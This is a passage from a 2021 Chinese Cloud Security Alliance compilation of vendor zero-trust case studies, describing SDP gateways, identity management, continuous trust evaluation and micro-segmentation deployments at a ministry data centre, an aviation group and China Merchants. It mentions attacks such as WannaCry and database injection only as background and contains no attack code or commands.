任子行智行零信任远程接入安全防护解决方案,采用 SDP 的技术架构,以安全浏览
器的方式将认证客户端与 Web 应用访问工具相结合,在实践零信任核心安全理念的同时
为用户带来了方便快捷的使用体验。这种“轻量级”的实施方案,有助于企业快速落地
零信任安全模型,使得零信任访问控制系统成为企业安全防护架构中最基础的防护设施。
2.3.1 技术优势
1.基于七层应用隧道技术,可完美替换传统 VPN
1)覆盖的安全能力更全面,理念更先进,拥有更强的身份认证和细粒度访问控制
能力。
2)适用场景更多,不局限于网络远程访问,企业内网零信任安全访问也可以做到。
3)因只需要通过浏览器快速发布,则可实现快速扩容,对网络链路质量要求没有
VPN 严格。
2、让企业应用彻底“隐身”,将攻击暴露面降至最低
1)零信任网关可以将企业内网所有核心资产和业务“隐藏”起来。
2)只有通过专用安全浏览器才能够与零信任网关建立通信隧道,并进而访问到受
保护的业务。
3、采用“零信任”理念,对用户动态按需授权和动态调整权限
1)任何用户都必须先进行认证后再接入,对于接入的授权用户,根据最小权限原
则只允许用户访问其允许访问的业务系统。
2)除了应用的维度之外,还可以对用户的访问设备、访问位置、访问时间等维度
进行安全限制。
3)系统可为不同用户配置不同的安全策略,并且基于来自终端环境、身份信息、
审计日志等多源数据建立用户的信任模型,对用户的访问风险进行实时评估,根据结果
©2021 云安全联盟大中华区-版权所有
16
动态调整其安全策略。
2.3.2 应用效果
将零信任身份安全能力内嵌入业务应用体系,构建全场景身份安全便捷,升级企业
安全架构。其主要价值交付有:
1. 信息安全加强
身份管理体系作为信息安全加强的重要举措,可有效保障公司机密及业务数据的安
全使用,保护其信息资产不受勒索软件、犯罪黑客行为、网络钓鱼和其他恶意软件攻击
的威胁,加强内部人员规范管理;平均减少了 31%的重复身份。
2. 业务流程风险控制
业务流程风险控制作为管理核心,身份治理体系可加强内外部相关人员访问的硬件
设备及业务系统进行集中管控,同时从管理制度、合规性、审计要求进行内部风险控制;
通过自动化的账号创建、变更、回收及重复密码工作,提升 IT 部门 91%的运维效率。
3. 提高企业生产力
为有效满足信息系统对业务的快捷响应能力,减少保护用户凭证和访问权限的复杂
性及开销,打造一套标准化、规范化、敏捷度高的身份管理平台成为经营发展的基础保
障,可极大提高企业生产力。通过集中的用户管理模块,访问认证模块及合规审计模块
的统一建设,有效减少 88%的信息化重复投入。
4. 降低运营成本
实现身份管理和相关最佳实践,可以多种形式带来重大竞争优势。大多数公司需要
为外部用户赋予到内部系统的访问权限。向客户、合作伙伴、供应商、承包商和雇员开
放业务融合,可提升效率,降低运营成本。用户从打开网页到登录进系统的访问时间,
通过统一认证与 SSO,提升 73%的用户访问效率。
2.4 经验总结
项目实施过程中,零信任团队面临客户环境多样性、网络复杂性等多方面挑战。零
信任产品上线可在不破坏原有客户环境的情况下进行,因此需要对客户外接设备进行逐
©2021 云安全联盟大中华区-版权所有
17
一对接,对客户网络环境进行深度适配。对接流程规范化、对接接口标准化是任子行零
信任产品后续提升的必经之路。
3、奇安信:零信任安全解决方案在部委大数据
中心的实践案例
奇安信零信任安全解决方案,基于以身份为基石、业务安全访问、持续信任评估和
动态访问控制四大核心特性,有效解决用户访问应用,服务之间的 API 调用等业务场景
的安全访问问题,是适用于云计算、大数据等新业务场景下的新一代动态可信访问控制
体系。解决方案已经在部委级客户、能源企业、金融行业等进行正式的部署建设或 POC
试点。下面以某部委大数据中心安全保障体系为例进行阐述。
3.1 方案背景
1.数据集中导致安全风险增加,大数据中心的建设实现了数据的集中存储与融合,
促进了数据统一管理和价值挖掘;但同时大数据的集中意味着风险的集中,数据更容易
成为被攻击的目标。
2. 基于边界的安全措施难以应对高级安全威胁现有安全防护技术手段大多基于传
统的网络边界防御方式,假定处于网络内的设备和用户都被信任,这种传统架构缺乏对
访问用户的持续认证和授权控制,无法有效应对愈演愈烈的内部和外部威胁。
3.静态的访问控制规则难以应对数据动态流动场景大数据中心在满足不同的用户
访问需求时,将面临各种复杂的安全问题:访问请求可能来自于不同的部门或者组织外
部人员,难以确保其身份可信;访问人员可能随时随地在不同的终端设备上发起访问,
难以有效保障访问终端的设备可信;访问过程中,难以有效度量访问过程中可能发生的
风险行为并进行持续信任评估,并根据信任程度动态调整访问权限。如上安全挑战难以
通过现有的静态安全措施和访问控制策略来缓解。
©2021 云安全联盟大中华区-版权所有
18
图 1 大数据中心安全场景
为应对上述安全挑战,基于零信任架构构建安全接入区,在用户、外部应用和大数
据中心应用、服务之间构建动态可信访问控制机制,确保用户访问应用、服务之间 API
调用的安全可信,保障大数据中心的数据资产安全。
3.2 部署方案
奇安信零信任安全解决方案应用于某部委的整体安全规划与建设之中,在新建大数
据共享业务平台的场景下,访问场景和人员复杂,数据敏感度高。基于零信任架构设计,
数据子网不再暴露物理网络边界,建设跨网安全访问控制区隐藏业务应用和数据。解决
方案通过构建零信任安全接入区,所有用户接入、终端接入、API 调用都通过安全接入
区访问内部业务系统,同时实现了内外部人员对于部委内部应用以及外部应用或数据服
务平台对于部委数据中心 API 服务的安全接入,并且可根据访问主体实现细粒度的访问
授权,在访问过程中,可基于用户环境的风险状态进行动态授权调整,以持续保障数据
访问的安全性。
©2021 云安全联盟大中华区-版权所有
19
图 2 奇安信零信任安全解决方案部署图
3.3 优势特点和应用价值
目前奇安信零信任安全解决方案在某部委大数据中心已经大规模稳定运行超过半
年,通过零信任安全接入区,覆盖应用达到 60 多个,用户终端超过 1 万,每天的应用
访问次数超过 200 万次,每天的数据流量超过 600G,有效保证了相关大型组织对大数
据中心的安全。奇安信零信任安全解决方案,能够帮助客户实现终端的环境感知、业务
的访问控制与动态授权与鉴权,确保业务安全访问,最终实现全面身份化、授权动态化、
风险度量化、管理自动化的新一代网络安全架构,构建组织的“内生安全”能力,极大
地收缩暴露面,有效缓解外部攻击和内部威胁,为数字化转型奠定安全根基。
注:本案例为 2020 年案例
4、吉大正元某大型集团公司零信任实践案例
4.1 方案背景
随着信息化技术不断发展,企业智慧化、数字化理念的不断深化已经深入各个领域,
云计算、大数据、物联网、移动互联、人工智能等新兴技术为客户的信息化发展及现代
化建设带来了新的生产力,但同时也给信息安全带来了新挑战。企业急需一套安全、可
信、合规的立体化纵深防御体系,确保访问全程可知、可控、可管、可查,变静态为动
态,变被动为主动,为信息化安全建设提供严密安全保障。
客户已经建立了自己的内部业务访问平台,通过部署边界安全等实现了一定程度的
安全访问。但是,随着业务访问场景的多样化和攻击手段的升级,当前的安全机制存在
一些局限性,需要进行升级改造。其中的主要问题如下:
1.传统安全边界瓦解
传统安全模型,仅仅关注组织边界的网络安全防护,认为外部网络不可信,内部网
络是可以信任的,企业内部信息化已不再是传统 PC 端,各种设备可随时随地进行企业
©2021 云安全联盟大中华区-版权所有
20
数据访问提高了企业运行效率,同时也带来更多安全风险。
2.外部风险暴露面不断增加
企业数据不再仅限于内部自有使用或存储,随着云计算、大数据的发展,数据信息
云化存储、数据遍地走的场景愈加普遍,如何保证在数据信息被有效、充分利用同时,
确保数据使用及流转的安全、授信是一大难题。
3.企业人员和设备多样性增加
企业员工、外包人员、合作伙伴等多种人员类型,在使用企业内部管理设备、家用
PC、个人移动终端等,从任何时间、任何地点远程访问业务。各种访问人员的身份和权
限管理混乱,弱密码屡禁不止;接入设备的安全性参差不齐,接入程序漏洞无法避免等,
带来极大风险。
4.数据泄露和滥用风险增加
在远程办公过程中,企业的业务数据在不同的人员、设备、系统之间频繁流动,原
本只能存放于企业数据中心的数据也不得不面临在员工个人终端留存的问题。数据的在
未经身份验证的设备间流动,增加了数据泄露的危险,同时也将对企业数据的机密性造
成威胁。
5.内部员工对数据的恶意窃取
在非授权访问、员工无意犯错等情况下,“合法用户”非法访问特定的业务和数据
资源后,造成数据中心内部数据泄露,甚至可能发生内部员工获取管理员权限,导致更
大范围、更高级别的数据中心灾难性事故。
4.2 方案概括和应用场景
4.2.1 实施范围
实施范围为集团总部及各个二级单位的国内员工、国外员工及供应商外协人员共计
4.5 万人。
4.2.2 实施内容
基于客户现有安全访问能力以及其面临的安全挑战,我们决定为用户建设以下几个
©2021 云安全联盟大中华区-版权所有
21
层面的安全机制:
1.将身份作为访问控制的基础
身份作为访问控制的基础,为所有对象赋予数字身份,基于身份而非网络位置来构
建访问控制体系。
2.最小权限原则
强调资源的使用按需分配,仅授予其所需的最小权限。同时限制了资源的可见性。
默认情况下,资源对未经认证的访问发起方不可见。
3.实时计算访问策略
访问策略决策依据包括:访问发起方的身份信息、环境信息、当前访问发起方信任
等级等,通过将这些信息进行实时计算形成访问策略。一旦决策依据发生变化,将重新
进行计算分析,必要时即使变更访问策略。
4.资源安全访问
默认网络互联环境是不安全的,要求所有访问链必须加密。
可信访问网关提供国密安全代理能力,保障访问过程中的机密性。
5.基于多源数据进行信任等级持续评估
访问发起方信任等级是零信任授权决策判断的重要依据。访问发起方信任等级根据
多源信任信息实时计算得出。
6.动态控制机制
当访问发起方信任等级发生变化后,策略执行引擎将向各个策略执行点进行策略下
发。再由各策略点执行控制动作。
©2021 云安全联盟大中华区-版权所有
22
4.2.3 总体架构
图 1 零信任总体架构图
1.动态访问控制体系
动态访问控制体系主要负责管理参与访问的实体身份管理、风险威胁的采集,以及
动态访问控制策略的定义及计算,动态访问控制的主要产品组件如下:
1)IAM
作为动态访问控制的基础,为零信任提供身份管理、身份认证、细粒度授权及行为
感知能力。
身份管理及认证能力:身份管理服务对网络、设备、应用、用户等所有对象赋予数
字身份,为基于身份来构建访问控制体系提供数据基础。认证服务构建业务场景自适应
的多因子组合认证服务。实现应用访问的单点登录。
细粒度权限管理能力:权限服务基于应用资源实现分类分级的权限管理与发布。实
现资源按需分配使用,为应用资源访问提供细粒度的权限控制。
2)安全控制中心
作为策略管理中心:负责管理动态访问控制规则。作为策略执行引擎:负责基于多
数据源持续评估用户信任等级,并根据用户信任等级与访问资源的敏感程度进行动态访
问控制策略匹配,最后将匹配到的结果下发到各个策略执行点。
3)用户实体行为感知
通过日志或网络流量对用户的行为是否存在威胁进行分析,为评估用户信任等级提
©2021 云安全联盟大中华区-版权所有
23
供行为层面的数据支撑。
4)终端环境感知
对终端环境进行持续的风险评估和保护。 当终端发生威胁时,及时上报给安全策
略中心,为用户终端环境评估提供数据依据。
5)网络流量感知
实现全网的整体安全防护体系,利用威胁情报追溯威胁行为轨迹,从源头解决网络
威胁;威胁情报告警向安全控制中心输出,为安全控制中心基于多源数据进行持续信任
评估提供支撑。
6)可信访问网关
代理服务是可信架构的数据平面组件,是确保业务访问安全的关口,为零信任提供
支持建立国密算法与 RSA 算法的安全通路,基于动态安全,制的会话阻断移动终端与客
户端登录均通过安全通道访问服务。
2.策略执行点
主要负责执行由安全控制中心下发的动态访问控制策略,避免企业资源遭到更大的
威胁。主要包括以下动态访问控制能力:
1)二次认证
当用户信任等级降低时,需要使用更加安全的认证进行认证,确保是本人操作。效
果:当用户信任等级降低时,需要使用生物识别技术和数字证书技术组合的方式才能完
成认证。
2)限制访问
当用户信任等级降低时,限制其能访问的企业资源,避免企业敏感资源对外暴露的
风险。效果:当用户信任等级降低时,通过动态权限的变化,使其不能访问到企业敏感
资源。
3)会话熔断
当用户访问过程中信任等级降低时,立即阻断当前会话。最大程度上降低企业资源
受到威胁的时间。效果:当用户下载文件时,如果信任等级降低,会导致下载失败。
4)身份失效
当用户信任等级过低时,为避免其进行更多的威胁活动。将其身份状态改为失效。
©2021 云安全联盟大中华区-版权所有
24
效果:身份失效后,不能访问任何应用。
5)终端隔离
当终端产生严重威胁时,对被隔离的终端进行网络层面上的隔离,效果:被隔离后
断网;
3.密码支撑服务
密码支撑服务为零信任提供底层的密码能力,负责保障所有访问的机密行和完整性。
4.2.4 逻辑架构
图 2
安全控制中心基于访问发起者的身份及终端环境、实体行为、网络态势等多源数据,
实时计算信任等级,并将信任等级与安全策略自动匹配,决定最终访问方式。
与云计算平台(公有云/私有云/混合云)结合保护企业资源
©2021 云安全联盟大中华区-版权所有
25
图 3
为客户构建动态的虚拟身份边界,解决内部人员访问、外部人员访问、外部应用访
问、外部数据平台问安全问题。
4.2.5 远程办公
客户远程办公主要包含以下几条路径:
1.用户直接访路径
通过零信任方案的落地,实现了国内外用户多网络位置、多种访问通道、多种脱敏
方式的自适应无感安全访问流程。
图 4
2.VPN 访问路径
将原有 VPN 访问场景迁移到用户直接访问。导致用户下定决心进行前的迁移的主要
原因如下:
1)安全问题
VPN 是为了解决连接的问题而设计的,其架构本身没有考虑资源安全问题。通过 VPN
链接,与资源在同一网络后,资源就面临直接暴露的风险。
2)权限控制问题
传统 VPN 在鉴定用户身份后即开放相应权限,缺乏整体的安全管控分析能力,容易
受到弱口令、凭证丢失等方式的安全威胁。
©2021 云安全联盟大中华区-版权所有
26
3)部署问题
VPN 的部署一般需要考虑网络的拓扑结构,升级往往要做设备替换,因为是网络层
的应用因而客户端侧容易出现各种连接不上的问题,需要管理员投入大量精力。
迁移后效果:
4)安全问题
零信任架构是基于安全设计的,其设计的目的就是解决应用访问的安全,具备减少
应用暴露面积的能力,这样黑客就很难找到攻击点。
5)权限控制问题
零信任在每次对用户认证时会进行动态访问控制,动态访问内容包括:动态认证控
制,动态权限控制和动态阻断控制。以信任评估等级决策授权内容。
6)部署问题
可信上云的部署不需要改变现网结构,同时可以随时根据需要,通过增加设备或虚
拟机弹性扩容。大大减少管理员的人工成本。
4.2.6 云桌面访问路径
将用户的云桌面作为一个特殊的 CS 应用与零信任进行对接,对接后使云桌面访问
路径得到了更强的安全保护。改造后具备了单点登录、动态认证,实时阻断能力,并使
用国密算法进行通道保护。
4.2.7 特权账号
集中管理所有特权帐户,提供密码托管服务、动态访问控制和特权账号发现等能力。
管理范围包括:操作系统特权账号、网络设备特权账号、应用系统特权账号等。
4.3 优势特点和应用价值
本方案与同类方案相比的主要优势在于:能够根据客体资源(应用、服务等)的敏
感程度,对客体进行分级管理,降低应用改造难度;建立细粒度动态访问控制机制;支
持国密与 RSA 通道自适应。
©2021 云安全联盟大中华区-版权所有
27
4.4 经验总结
零信任项目不是交钥匙工程。除了有好的方案与好的产品做支撑外,还需要对客户
的访问方式方法、进行全面而细致的调研,紧密结合用户应用场景不断的迭代零信任动
态访问控制策略,才能最大程度上兼顾安全与易用性。
5、格尔软件航空工业商网零信任安全最佳实践
5.1 方案背景
中国航空工业集团有限公司(简称“航空工业”)是由中央管理的国有特大型企业,
是国家授权的投资机构,于 2008 年 11 月 6 日由原中国航空工业第一、第二集团公司重
组整合而成立。集团公司下辖百余家成员单位及上市公司,员工逾 40 万人。
2019 年,航空工业深入贯彻落实习总书记关于网络安全和信息化工作的系列重要
讲话精神,推动集团内部各成员单位之间的办公协同和数字化转型,建设了覆盖全集团
所有成员单位的商密网移动办公平台。平台使用阿里专有云架构建设,企业 OA、邮件、
即时通、招采平台等内部应用业务系统相继上云,促进跨地区、跨部门、跨层级的数据
资源共享和业务协同。随着移动办公和业务系统的逐渐云化,商网的业务架构和网络环
境随之发生了重大的变化,访问主体和接入场景的多样化、网络边界的模糊化、访问策
略的精准化等都对传统基于边界防护的网络安全架构提出了新的挑战。目前在商网移动
办公安全架构中存在的问题主要包括:个人移动办公终端从注册、使用到删除的设备全
生命周期难掌控,移动办公终端中的运行环境监控、恶意应用安装和数据保护难管理;
使用移动办公终端的人员身份冒用和越权访问难预防;现有的移动终端一次性认证通过
后即取得了安全系统的默认信任,而移动终端的运行环境是随时可能发生变化的,第三
方恶意应用系统的安装和病毒感染随时可能造成正在访问的敏感数据被窃取;业务系统
采用云化部署,以容器化和 API 化提供服务,但对 API 接口和服务的访问防护仍停留在
访问认证层面,尚无对 API 和服务调用进行权限控制;业务系统中存储的敏感数据访问
©2021 云安全联盟大中华区-版权所有
28
尚未有明确的分级分类访问机制,对于访问敏感数据的应用和用户无从控制和审计。
针对商网移动办公应用中存在的上述新安全风险和新安全挑战,航空工业坚持新问
题新解决思路的原则,引入全新的网络安全理念-零信任解决方案。从新的角度出发,
零信任解决方案以“持续信任评估”、“动态访问控制”和“软件定义边界”的理念应对
集团商网新的网络挑战,创造新的安全模式,构建零信任与传统安全防御互相协同的安
全技术新体系。
5.2 方案概述和应用场景
5.2.1 零信任安全模型
零信任的本质是在访问主体和客体之间构建以身份为基石的动态可信访问控制体
系,通过以身份为基石、业务安全访问、持续信任评估和动态访问控制的关键能力,基
于对网络所有参与实体的数字身份,对默认不可信的所有访问请求进行加密、认证和强
制授权,汇聚关联各种数据源进行持续信任评估,并根据信任的程度动态对权限进行调
整,最终在访问主体和访问客体之间建立一种动态的信任关系。
图 1 零信任安全模型
©2021 云安全联盟大中华区-版权所有
29
5.2.2 项目总体架构设计
图 2 零信任架构设计
1. 密码基础设施
依托商网现有的密码基础设施对其网络平台提供密码密钥管理服务;电子认证基础
设施(PKI/CA)对不同对象,如人员、设备、应用、服务等提供基于国产商用密码算法
的数字证书管理服务。
2. 可信身份管控平台(身份管理基础设施)
依托密码支撑体系,以身份为中心,提供不同对象的规范化统一管理服务、多类型
实体身份鉴别服务、细粒度的授权管理与鉴权控制服务、安全审计服务。
3. 零信任网关管理平台
支持多因子认证机制,结合动态上下文环境监测,实现不同接入通道下为用户提供
细粒度的统一访问控制机制,支持多台分布式部署网关的集中管理和统一调度。自动编
排策略并下发至各网关执行点,实现动态访问控制和内部网络隐藏,支持前端(客户端
到网关)流量加密、后端(网关到应用)流量加密。
4. 环境感知中心
©2021 云安全联盟大中华区-版权所有
30
负责对终端身份进行标识,对终端环境进行感知和度量,并传递给策略控制中心,
协助策略控制中心完成终端的环境核查。通过用户行为分析中心和环境感知中心,建立
信任评估模型和算法,实现基于身份的信任评估能力。
5. 策略控制中心
负责风险汇聚、信任评估和指令传递下发;根据从环境感知中心、权限管理中心、
审计中心和认证中心等获取的风险来源,进行综合信任评估和指令下发;指令接收及执
行的中心是认证中心,以及安全防护平台和安全访问平台。
5.2.3 项目逻辑架构设计
图 3 零信任逻辑架构
零信任服务体系架构分为主体区域、安全接入区、安全管理区、及客体。整个逻辑
结构展示了主体访问到客体的动作,通过安全接入区对主体的访问进行安全接入控制与
策略管理。最终实现动态、持续的访问控制与最小化授权。
©2021 云安全联盟大中华区-版权所有
31
5.2.4 总体部署结构
图 4 总体部署结构
5.2.5 业务应用场景
5.2.5.1 基于数字证书的移动办公场景
本项目中有超过 20 万的用户使用移动终端访问商网移动办公系统,如何保证移动
终端用户身份认证安全和重要数据完整性安全是移动办公安全的基础和重点。通过在内
©2021 云安全联盟大中华区-版权所有
32
部云建设部署 PKI/CA 体系,为移动终端提供移动发证服务。用户通过 PKI/CA 体系提供
的密钥分离、协同签名等防护技术,可自助申请个人证书和设备证书,实现基于密码技
术的数字证书认证和数据完整性保护。移动终端中不会存储完整的密钥信息,可以防止
个人移动终端丢失造成的身份冒用、数据泄密等风险。
5.2.5.2 基于终端环境感知的持续信任评估场景
通过终端设备安装的环境感知模块,零信任平台可持续感知终端设备的物理位置、
基础环境、系统环境、应用环境等多维度的安全环境,并根据终端环境变化和安全策略
配置,评估终端设备的可信任程度,根据信任程度对终端执行二次认证、升级认证及阻
断连接等访问控制行为。
5.2.5.3 纵深防御场景
在纵深防御场景下,在每个执行点都要进行动态鉴权。动态鉴权主要提供权限的动
态自动授予,动态鉴权综合考虑终端环境、用户行为、身份强度等多种因素进行动态计
算,为访问控制引擎提供动态的授权因子。权限系统根据动态的授权因子,对外部授权
请求进行实时授权处理,基于授权库的多维属性和授权信息引擎提供的实时信息反馈进
行授权判断。
©2021 云安全联盟大中华区-版权所有
33
5.3 优势特点和应用价值
5.3.1 方案实现效果
方案采用领先的零信任安全架构解决集团数据访问的安全性问题,为集团树
立行业安全标杆,重构信息安全边界,从根源上解决数据访问的安全性问题。在
建设完成之后,可以实现如下的安全能力:
1.具备终端环境风险感知能力
办公终端安装终端环境感知 Agent(Windows 版本、VMware 云桌面版本),
通过终端环境感知 Agent 对员工的办公终端提供覆盖基础安全、系统安全、应用
合规、健康状况的四大类感知,一旦检测到安全风险,立即上报至智能身份分析
系统。
2.具备多维度身份安全分析能力
通过构建智能身份分析引擎,结合各类系统的登录日志、访问日志、态势感
知平台的异常事件、终端环境感知中心报送的环境风险等信息,提供信任评估能
力。依据建立的行为基线,对所有用户的访问请求进行综合分析、持续评估。
3.具备动态访问控制能力
通过构建安全认证网关作为数据层面业务访问的统一入口、动态访问控制策
略的执行点;构建零信任网关控制台作为控制层面的访问控制策略决策点;通过
环境感知 Agent 对用户的终端进行全方位多维度感知,确保用户的终端环境安全
及安全风险感知上报;构建智能身份分析系统的用户行为进行多维度分析,进行
信任评估并上报至零信任网关控制台进行决策,实现动态访问控制的整体逻辑,
具备动态访问控制能力。
4.具备全链路的访问安全加密授权能力
所有的访问请求都会被加密,采用 TLS 传输加密技术,可通过传输数据的双
向认证防止中间人攻击。所有的访问请求都需要认证,每个访问请求都需要携带
token 进行身份的认证,认证通过后在下一次访问仍然会重新认证,避免了原有
的一次认证就可以访问所有资源带来的安全风险,达到持续认证持续授权,实现
访问的最小化原则。
©2021 云安全联盟大中华区-版权所有
34
5.3.2 项目运行状态
1.业务持续优化
自 2020 年 2 月航空工业商网零信任安全管理平台正式投入使用以来,截至
目前,平台注册单位四百余家,覆盖全部三级(含)以上单位,注册用户已超过
20 万人,日活(每天登录平台使用)超 10 万人。疫情防控期间,更是通过云报
送功能,时刻掌握每位员工疫情期间的体温信息。
2.安全防护提升
航空工业商网零信任管理平台部署投入使用后,互联网的攻击接踵而至,绝
大部分是针对移动办公业务系统的。截止目前,共处置突发事件 3 起,均对攻击
行为完美监控并及时阻断和持续监测。在事件处理过程中,基于零信任技术架构
的主动防护体系提供了较传统网络安全防护架构所不具备的安全性。其中,基于
密码技术的身份鉴别与数据保全起到重要作用。攻击者针对业务系统及数据库,
从身份上已经不具备访问业务系统及数据库的权限。即使通过数据库注入的方式,
产生注入的行为流量被数据库审计及态势感知平台第一时间定位告警。其次,通
过密码技术对重要数据进行了机密性和完整性保护,使攻击者即使成功完成注入,
也无法获取业务系统数据信息及篡改商网的数据内容。
对各类攻击的源 IP 地址进行分析后发现,大部分为国外 IP 地址,明显的说
明国外的黑客组织视我国军工行业敏感数据为首要攻击目标。而零信任技术的应
用,针对的就是用户主体对客体的持续信任评估和动态的访问控制,有效的保证
了集团数据的安全性和业务应用的持续性。
5.3.3 项目推广价值
1.首个零信任应用示范项目
航空工业商网零信任管理平台作为中航工业集团乃至军工行业及大型中央
企业集团总部内首个采用新型“零信任”技术部署应用来统一支撑全集团日常办
公的平台,为军工行业和中央企业响应落实国家“数字化转型”战略,迈出了坚
实的第一步,其示范意义重大。
各军工集团和大型中央企业集团总部通过借鉴“零信任”架构的应用模式,
©2021 云安全联盟大中华区-版权所有
35
结合自身集团的业务现状、管理手段、生产管控机制、信息化建设及防护措施,
将新技术应用到集团的业务工作开展中,提高企业的办公效率。同时,加快推进
全行业的数字化转型进度,为未来新型基础设施建设中的大数据中心及工业互联
网建设中,提供更加安全的主动防御网络架构。
2.支撑疫情常态化防控
疫情防控期间,航空工业依托商网办公平台、视频会议系统等数字化技术为
集团提供有效沟通联络渠道,充分运用信息化手段,提升信息传达能力,快速支
撑集团掌握全员基本信息、分布区域及身体状况;为响应疫情防控要求,减少召
开现场会议,降低人员聚集感染风险,实现随时音视频连线功能,快速掌握疫情
防控、复工复产等情况;帮助各单位有效落实疫情防控部署、支持各单位快速有
序推进复工复产。
商网零信任架构模式可在各军工集团和大型中央企业集团总部推广,在疫情
防控常态化的态势下,推行零信任安全架构建设,改造提升传统产业,培育数字
产业,落实落地数字化转型战略,围绕办公、党建、教育培训、业务协同等场景,
开发实施云会议、在线学习、云直播、云党建、云工会、移动考勤、安全巡检、
访客登记管理等应用,满足远程办公、移动办公、业务协同等高效、便捷的工作
场景需求。
5.4 经验总结
本项目完全践行零信任理念开展建设,工期短、任务重、可借鉴经验少,对
集团信息化建设部门和格尔公司都是极大地挑战,同时也是完善集团商网全新安
全架构体系的最佳机遇。在集团和格尔公司的共同努力下,在规定建设时间内完
成了零信任体系的全面建设,实现了集团商网用户的统一身份管理、统一授权、
统一认证、统一审计,同时融合 PKI 体系,提供移动端 APP 证书签发、签名验签、
证书登录等功能。零信任平台整合了商网资源及业务系统,打造成为统一身份中
台功能,给集团及成员单位提供应用上云的身份集成服务,实现以商网办公平台
为基础的安全可靠的业务访问,在实际使用中获得了领导和同事的一致好评。
在零信任平台建设成功的同时,我们也总结经验,展望新的技术实现和新的
业务拓展。商网零信任平台后期将向平台容器化部署模式逐步转化,同时也考虑
©2021 云安全联盟大中华区-版权所有
36
与应用的深度联动,实现应用敏感操作的二次认证等拓展业务,更好的为商网提
供安全、便捷、贴心的服务。
6、厦门服云招商局零信任落地案例
6.1 方案背景
数据中心承载的业务多种多样,早期数据中心的流量,80%为南北流量,随
着云计算的兴起,业务上云成为了趋势,在云计算时代 80%的流量已经转变为东
西向流量,越来越丰富的业务对数据中心的流量模型产生了巨大的冲击。云环境
中南北向的数据经过防火墙,可以通过规则做到网络隔离,但是东西向的数据无
需经过防火墙,也就是绕过了防火墙设备,另外,防火墙生命周内基本不做调整,
难以实时更新策略,无法适应现代多变的业务环境,所以无法做到业务的精细化
隔离控制,网络威胁一旦进入云平台内部,可以肆意蔓延。
传统的网络隔离有 VLAN 技术、VxLAN 技术、VPC 技术。VLAN 是粗粒度的网
络隔离技术,VxLAN 技术、VPC 技术采用 Hypervisor 技术实现网络隔离,但是
远没有达到细粒度的网络隔离。
2020 年发生了微盟删库重大恶意事件。在事件发生前,微盟已经有了一些
安全管控手段如个人独立的 VPN、堡垒机,而当时删库的内部员工通过登陆内网
的跳板机,进而删除微盟 SAAS 业务服务的主备数据库。此次删库事件导致微盟
损失巨大,SaaS 服务停摆导致微盟平台约 300 万个商家的小程序全部宕机,公
司信誉形象大打折扣。财务损失方面,除拟用于赔付客户的 1.5 亿元外,其股价
下跌超 22%,累计市值蒸发超 30 亿港元。纵观微盟删库事件,其内部安全管理
与防护存在严重的问题,缺少科学、高效、安全的隔离策略,对开发环境、测试
环境和生产环境进行严格微隔离。
2017 年 5 月 12 日,WannaCry 勒索病毒事件全球爆发,以类似于蠕虫病毒的
方式传播,攻击主机并加密主机上存储的文件,横向覆盖整个内部网络,然后要
求以比特币的形式支付赎金。WannaCry 爆发后,至少 150 个国家、30 万名用户
中招,造成损失达 80 亿美元,已经影响到金融,能源,医疗等众多行业,造成
©2021 云安全联盟大中华区-版权所有
37
严重的危机管理问题。中国部分 Windows 操作系统用户遭受感染,校园网用户首
当其冲,受害严重,大量实验室数据和毕业设计被锁定加密。部分大型企业的应
用系统和数据库文件被加密后,无法正常工作,影响巨大。
根据《网络安全法》、等保 2.0 的相关要求,各组织与企业在等级保护的对
象、保护的内容、保护的体系上要从被动防御加强为事前、事中、事后全流程的
安全可信、动态感知和全面审计。另外除了对传统信息系统、基础信息网络的覆
盖外还要囊括云计算、大数据、物联网、移动互联网和工业控制信息系统。
只有以攻击者的角度换位思考攻击者的目的,识别攻击者眼中的高价值目标,
进而定义防御目标,才是有效应对之策。在近几年的大型攻防演练或者实战中,
可以发现,企业对网络安全的认识只停留在应付性的表面工作,安全意识停留在
“重外敌,轻内鬼”的阶段,缺乏全局视角下发现实际环境中安全风险的能力。
招商局集团内部存在弱口令风险、老旧资产可能成为攻击跳板、网络缺乏细粒度
隔离措施、服务器普遍零防御等安全问题,这些问题在日后都会成为致命弱点。
6.2 方案概述和应用场景
针对当前招商局集团网络防护体系突出的问题,我们引入零信任架构作为防
护的。零信任安全防御核心思想是不再区分内、外网,要求对任何试图接入信息
系统的访问进行持续验证,消灭特权帐户。将以网络为中心的访问控制改变为以
身份为中心的动态访问控制,遵循最小权限原则,构筑端到端的逻辑身份边界,
引导安全体系架构从“网络中心化”走向“身份中心化”,可以有效的避免内部
人员的恶意操作。
方案主要使用安全狗云隙微隔离系统和云眼主机安全检测与管理系统,采集
工作负载之间的网络流量,自动生成访问关系拓扑图,根据可视化的网络访问关
系拓扑图,看清各类业务所使用的端口和协议,并以精细到业务级别的访问控制
策略、进程白名单、文件访问权限等安全手段,科学、高效、安全地实现对开发
环境、测试环境和生产环境严格微隔离。各个模块进行联动,模块间数据联通,
形成闭环系统,整体方案赋予业务资产安全体系攻击防御、精细化的访问控制能
力以及行为合规能力,落实零信任安全理念。
云隙微隔离系统的组成由业务可视化、流量控制、Agent 部署与管理三个功
©2021 云安全联盟大中华区-版权所有
38
能模块,各个模块进行联动,模块间数据联通,形成闭环系统,下图为微隔离系
统架构示意图:
图 1
微隔离系统包括如下组件模块:
1.业务拓扑
通过显示工作组位置、数量、工作负载信息,动态展示出工作组下工作负载
的业务流量及访问关系,直观的展示东西向和南北向的访问关系。同时还可在拓
扑图上选择访问关系并设置访问规则策略。可指定工作负载查看与该工作负载相
关的流量日志,查看访问者的 IP、端口、访问时间、访问次数。
2.工作组及工作负载管理
将工作负载进行分组,用位置、环境和应用来确定工作组的唯一性,显示用
户相关的工作负载及工作组信息包括基础信息、服务信息及策略信息,并提供编
辑标签。
3.策略信息管理
管理策略集基础信息,对策略集范围和规则进行操作管理,策略可分为组内
策略和组间策略,策略应用可根据工作组、标签角色或工作负载。
4.IP 列表管理
可将单个或多个 IP 定义为 IP 列表,通过对 IP 列表添加允许操作,达到对
南北向流量集中化处理。
©2021 云安全联盟大中华区-版权所有
39
云隙微隔离采用 Agent 工作负载采集服务器和主机的流量信息,并将相同特
征的工作负载,标记上相同的标签。依据实时流量和角色标签,自动生成可视化
的业务拓扑图,集中、自动、灵活地配置策略规则;通过策略和策略对象解耦,
策略范围确定策略对象,以此实现动态改变服务器上的安全规则,实现对主机全
方位业务流量访问控制。
6.3 优势特点和应用价值
1.流量可视化,流量可视化有利于进行业务分析,使得业务分析更加灵活和
简便,辅助运维人员“看清情况”,进而设计精准的规则策略。
